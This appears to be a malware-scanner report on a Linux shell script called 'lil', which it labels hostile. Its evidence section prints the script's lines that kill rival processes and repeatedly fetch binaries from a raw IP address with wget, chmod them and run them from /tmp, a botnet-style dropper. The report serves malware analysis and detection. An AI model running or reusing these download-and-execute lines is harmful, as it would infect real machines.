Hostile 100% linux Download

lil

Downloads and executes remote payloads

Raw-IP wget world-writable fetch executeRepeated raw-IP payload download chmod execution
SHA-256ff591fcf9b62bf02aaf8b9f3e64fd14e6eb4d2d4275cffee0aa9cdd863c82840

Evidence

Raw IP bulk download chmod execute lines 12–22
12:41… t"*|*"dvrLocker"*|*"acd"*|*"dvrHelper"*|*".c.pid"*)
13 kill -9 "$pid"
14 ;;
15 esac
16done
17cd /tmp; rm -rf E4Dp; wget http://129.121.110.105/E4Dp; chmod 777 E4Dp; ./E4Dp lilin;
18cd /tmp; rm -rf LFSo; wget http://129.121.110.105/LFSo; chmod 777 LFSo; ./LFSo lilin;
19cd /tmp; rm -rf BFg; wget http://129.121.110.105/BFg; chmod 777 BFg; ./BFg lilin;
20cd /tmp; rm -rf 1h4; wget http://129.121.110.105/1h4; chmod 777 1h4; ./1h4 lilin;
21cd /tmp; rm -rf 3fO; wget http://129.121.110.105/3fO; chmod 777 3fO; ./3fO lilin;
22echo "" > lil; rm -rf lil;

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.